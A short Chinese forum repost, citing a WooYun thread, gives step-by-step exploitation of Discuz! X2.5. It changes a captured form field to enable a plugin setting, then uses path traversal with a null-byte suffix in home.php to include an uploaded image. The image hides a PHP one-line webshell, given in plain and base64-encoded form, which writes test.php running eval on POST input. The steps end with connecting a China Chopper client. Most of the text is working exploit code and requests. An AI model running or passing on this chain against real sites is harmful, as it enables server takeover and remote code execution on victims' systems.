原帖地址內容:
http://zone.wooyun.org/content/3894
用戶 – 用戶欄目 – 欄目分組 – 提交 – 抓包 (我就是在這步出錯的,一定要提交,不然抓到的數據包不一樣)
1 | Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]" |
改爲
1 | Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]" |
訪問
1 | /home.php?mod=spacecp&id=../../robots.txt%0057 |
本地測試dzx2.5抓包 把base改爲下圖中的plugin
測試環境中,上傳的一句話***菜刀連接失敗,最後改爲了base64加密
//加密前的內容 <?php @eval(fputs(fopen('./test.php','w+'),'<?php eval($_POST[c]);?>');));?> //加密後的內容 <?php @eval(base64_decode('ZnB1dHMoZm9wZW4oJy4vdGVzdC5waHAnLCd3KycpLCc8P3BocCBldmFsKCRfUE9TVFtjXSk7Pz4nKTs='));?>
合成圖片***,上傳,
/home.php?mod=spacecp&id=../../圖片馬地址%0057
在當前目錄下生成了test.php,菜刀連接之...